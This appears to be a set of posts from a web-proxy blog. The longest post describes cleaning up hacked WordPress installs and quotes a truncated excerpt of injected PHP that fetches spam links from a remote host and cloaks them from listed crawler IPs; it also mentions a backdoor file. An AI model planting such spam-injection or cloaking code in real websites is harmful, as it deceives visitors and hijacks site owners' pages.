Nov 30

Well as you can see, the Web Proxy Blog is back online despite the best efforts of a particularly mean set of hacks that we want to share with you to help you fix your problems and secondly to help prevent people making the same mistakes using WordPress that we did.

Firstly, this was a multiple hack across many different domains and blogs, though they all had a few things in common;

They were all run/updated from a computer that was infected with with worms, backdoors, trojans and goodness know what else. Keep your antivirus software up to date!

Secondly, they were all WordPress blogs that should have been updated. The oldest was version 2.0 and the latest was WP 2.63. We would have thought that the WordPress 2.6.3 and 2.5 installations would have been safe, but this hack is fairly new.

Finally, all the blogs were on Dreamhost. Could be a coincidence – we would be interested in hearing your comments.

The hacks manifested in a number of ways, but they all looked fine in a browser but had dozens hidden links at the bottom of each blog post. It’s only when I looked through the source code, or switched off the CSS that the links could be seen. Most of the links were real estate or lindsay lohan screensavers or something!

Another thing that was noticeable was that there were strange new files and folders in the blogs eg;
/blog/wp-includes/js/tinymce/themes/advanced/images/xp

In these directories I found files with strange filenames eg. 05417e755b378ea9a91fdbe7f71712ce. These files contained links that were appearing in the footer.

Another thing I noticed was that the wp-blog-header.php file was much larger than the original and had strange coding in it;

/* r_start */
$rurl=”http://sattan.org/feed/search.php?q=”;
$rkeys=array(”buy tramadol”,”tramadol”,”tramadol online”,”soma”,”auto insurance”,”car insurance”,”backing up files”,”car insurance quote”,”auto insurance quotes”,”auto insurance company”,”auto insurance quote”,”fioricet”,”insurance quotes”,…………………….. religion”);
$ips=unserialize(base64_decode(”YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4yMzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9″));
$_ip=false; if(is_array($ips)) foreach($ips as $ip) if($ip==$_SERVER['REMOTE_ADDR']){ $_ip=true; break; }
if(sizeof($_COOKIE)==0 && $_ip==false && ……………………..

………..
exit;

There was also some strange coding in the template footer.php file with a 1,000 character long, Base64 string that collected spam links from www.spamreport.ru.

I also found a backdoor file, remv.php, in the root of the WordPress themes directory.

Anyway, I didn’t fancy cleaning up that mess so I decided to make a backup via ftp, delete the old files and so a completely fresh WordPress install. The only problem was that the hack seemed to have changed the folder permissions from 755 to 555, which meant that we couldn’t delete our own files!

That was easy enough to fix; setting the attributes back to their proper value, but we did notice a few files and folders that had been modified to 777 (ie read/write/execute permission) confirming our suspicion that this was a mean hack and that the best way to fix it would be to delete everything and start with a fresh installation.

The good news is that once we had done this the blogs were back to normal, with the exception of the pre WordPress 2.2 blogs that had their character set altered so that pound signs, foreign letters etc were garbled with “Ä ±” or similar. Removing these two lines from the wp-config.php fixed this;

define(’DB_CHARSET’, ‘utf8′);
define(’DB_COLLATE’, ”);

You don’t need these two lines if you are upgrading from pre WP 2.2 versions because the character sets are already built into the blog.

As a final precaution I reset the MySQL database table password and the WP admin password for good measure. We also reset the ftp password because I suspect this was a hack across so many levels that just about every one of my usernames and passwords has been compromised.

So, that’s how I spent most of my Sunday! Anyone have similar experiences, shortcuts etc. they want to share?

May 11

Hey, it appears you have already subscribed to our Mailing List to get New Proxy Websites Daily

Thanks!

For those wondering, this is just a placeholder to when people try to sign on our mailing list twice

May 04

The idea is simple, write a blog post about us or link to us from your proxy site with the anchor text ‘Web Proxy‘ and well post a link to you from this site in a blog post.

Benefits for you:

  • A link thats going to have some PR on the next update
  • Traffic to your website from our readers
  • More backlinks helping with your SEO

An example of your link could be:

Web Proxy Blog helps you earn money with proxies.

Once you’ve done that, you can either comment on a blog post letting us know where it is (an extra link for you) or you can email: 1@webproxyblog.com

“What are you waiting for?”

Apr 27

Due to the nature of the web and the legalities, I thought its in our best interest to take down our Google Proxy and our Yahoo Proxy due to possibly copyright and trademark infringements and they arent worth losing a Google Adsense account over. With that said we have given a facelift to our http Proxy and our Live Proxy so feel free to let us know what you think.

After having dealt with proxy changes, we feel that weve learned a bit about the design of proxies.

  • Have a unique favicon, I had the idea of having the same favicon for all the sites and even this blog but if we want people to use and bookmark them all then the favicons should be unique.
  • Put attention into your logo, thats what will help people remember the site and lets them know how much attention and care you have put into it so keep it fresh
  • Get some icons from the icon library if you need some ideas
Apr 25

As the title seems to suggest, I think its better if we post our proxy revenues monthly instead of you guys guessing how much we are earning along with our monthly traffic stats for all sites to make the monthly look at things a little more interesting. Hopefully you guys prefer it that was and Im sure it will be a lot easier for us just posting income and traffic stats once per month instead of having too fill up a post just to mention that our best day so far is $2.50 (which is true).

I have started to remove all proxy topsites from the site to see how that affects traffic etc which will be interesting and have a few theories about making money with proxies that Im going to try out. Thanks for reading!

Apr 14

Wow, for once the first blog post without a title such as Welcome to WebProxyBlog, but I find this title much more descriptive, over the course of this blog you can follow us either making money or losing money on proxy sites, we are going to hold nothing back (theres two of us by the way) as we build up our proxy network, lose money or make it, banned from adsense? hosting issues? Well have it all so you arent alone. We do the testing that you want to know the answers too and offer the advice on where our traffic comes from (exactly) and where our links come from. So why is this blog here? Well thats simple:

  1. To link too all our proxies and spread link love and traffic
  2. To optimise in order to not have to optimise each proxy, we are crazily trying to rank for Web Proxy
  3. Help you guys with your sites and learn from you guys from your comments on what we are doing
  4. Be 100% transparent about earnings, issues and technicalites that we might face or actually face

Theres so much to post already, but Im going to work on a new design, or at least something different to the default wordpress look, link to our sites and get posting on how we set them all up, why we chose what we chose etc and how we are building traffic. We hope that you will follow our journey and then decide whether making a proxy is good for you. There may be times we get lucky and you cant replicate what we have got, or there may be times that we fell in a pittfall that some of you with proxies already avoided which might slow us down, but its a learning curve for us aswell. Being in Internet Marketing 24/7 for the last 18 months I honestly believe we can build traffic and keep traffic whilst making money on a slim budget if any at all, we will link to what we use, how we use it etc. I run ViperChill and will soon be announcing this site over there and on various forums, until then we have our proxies to setup and a wordpress theme to implement ;) .

Take care all